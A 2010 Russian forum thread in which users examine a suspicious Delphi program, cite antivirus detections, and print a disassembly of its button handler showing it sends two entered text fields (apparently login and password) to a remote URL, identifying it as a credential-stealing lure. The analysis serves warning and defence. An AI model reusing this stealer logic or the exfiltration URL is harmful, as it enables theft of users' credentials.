Страница 1 из 1
есть просьба к программистам
Добавлено: 03.05.2010, 01:09
Arch
мне скинули прогу, и при проверки на virustotal, показало только 1 вирус, так вот, возникло сомнение, стоит ли запускать прогу. Прога написана на Delphi. прошу программистов проверить исходники.
Заранее Спасибо.
Re: есть просьба к программистам
Добавлено: 03.05.2010, 01:42
Snakeus
BeCooL
Ну во-первых Sophos определил её как Sus/Behav-269 - Suspicious behavior (Подозрительная активность).
Далее, Касперский: "В приложении обнаружена ссылка на веб-страницу
http://httpz.ru/nzwvam91zgg.gif?mail используемую для кражи паролей, номеров кредиток etc"
Во-вторых где исходники?
обожаю xss'ки
Re: есть просьба к программистам
Добавлено: 03.05.2010, 09:51
Pr0Ger
если боялся запустить, то вот (желтая рамка пририсована sandboxie)
При нажатии кнопки забирает содержимое из обоих TEdit и обращается к _https://httpz.ru/nzwvam91zgg.gif?
листинг кода нажатия на кнопку
Код: Выделить всё
00481344 55 push ebp
00481345 8BEC mov ebp, esp
00481347 33C9 xor ecx, ecx
00481349 51 push ecx
0048134A 51 push ecx
0048134B 51 push ecx
0048134C 51 push ecx
0048134D 51 push ecx
0048134E 51 push ecx
0048134F 53 push ebx
00481350 8BD8 mov ebx, eax
00481352 33C0 xor eax, eax
00481354 55 push ebp
* Possible String Reference to: 'é$øÿëÎ[‹å]Ã'
|
00481355 68F6134800 push $004813F6
***** TRY
|
0048135A 64FF30 push dword ptr fs:[eax]
0048135D 648920 mov fs:[eax], esp
00481360 8D55F4 lea edx, [ebp-$0C]
* Reference to control TForm1.Edit1 : TEdit
|
00481363 8B8304030000 mov eax, [ebx+$0304]
* Reference to: Controls.TControl.GetText(TControl):TCaption;
|
00481369 E8CA3BFBFF call 00434F38
0048136E 8B4DF4 mov ecx, [ebp-$0C]
00481371 8D45F8 lea eax, [ebp-$08]
* Possible String Reference to: 'https://httpz.ru/nzwvam91zgg.gif?'
|
00481374 BA0C144800 mov edx, $0048140C
* Reference to: System.@LStrCat3;
|
00481379 E88A2EF8FF call 00404208
0048137E 8B55F8 mov edx, [ebp-$08]
00481381 8D4DFC lea ecx, [ebp-$04]
* Reference to control TForm1.IdHTTP1 : TIdHTTP
|
00481384 8B8310030000 mov eax, [ebx+$0310]
|
0048138A E8F9D5FFFF call 0047E988
0048138F 8D55E8 lea edx, [ebp-$18]
* Reference to control TForm1.Edit2 : TEdit
|
00481392 8B8308030000 mov eax, [ebx+$0308]
* Reference to: Controls.TControl.GetText(TControl):TCaption;
|
00481398 E89B3BFBFF call 00434F38
0048139D 8B4DE8 mov ecx, [ebp-$18]
004813A0 8D45EC lea eax, [ebp-$14]
* Possible String Reference to: 'https://httpz.ru/nzwvam91zgg.gif?'
|
004813A3 BA0C144800 mov edx, $0048140C
* Reference to: System.@LStrCat3;
|
004813A8 E85B2EF8FF call 00404208
004813AD 8B55EC mov edx, [ebp-$14]
004813B0 8D4DF0 lea ecx, [ebp-$10]
* Reference to control TForm1.IdHTTP1 : TIdHTTP
|
004813B3 8B8310030000 mov eax, [ebx+$0310]
|
004813B9 E8CAD5FFFF call 0047E988
004813BE 33C0 xor eax, eax
004813C0 5A pop edx
004813C1 59 pop ecx
004813C2 59 pop ecx
004813C3 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '[‹å]Ã'
|
004813C6 68FD134800 push $004813FD
004813CB 8D45E8 lea eax, [ebp-$18]
* Reference to: System.@LStrClr(void;void);
|
004813CE E8292BF8FF call 00403EFC
004813D3 8D45EC lea eax, [ebp-$14]
004813D6 BA02000000 mov edx, $00000002
* Reference to: System.@LStrArrayClr(void;void;Integer);
|
004813DB E8402BF8FF call 00403F20
004813E0 8D45F4 lea eax, [ebp-$0C]
* Reference to: System.@LStrClr(void;void);
|
004813E3 E8142BF8FF call 00403EFC
004813E8 8D45F8 lea eax, [ebp-$08]
004813EB BA02000000 mov edx, $00000002
* Reference to: System.@LStrArrayClr(void;void;Integer);
|
004813F0 E82B2BF8FF call 00403F20
004813F5 C3 ret
* Reference to: System.@HandleFinally;
|
004813F6 E98124F8FF jmp 0040387C
004813FB EBCE jmp 004813CB
****** END
|
004813FD 5B pop ebx
004813FE 8BE5 mov esp, ebp
00481400 5D pop ebp
00481401 C3 ret
по моему это программа из жанра "введи логин и пароль и сколько голосов вконтакте тебе добавить"
Re: есть просьба к программистам
Добавлено: 03.05.2010, 13:47
Arch
ну пасиб за помощь. можно закрывать
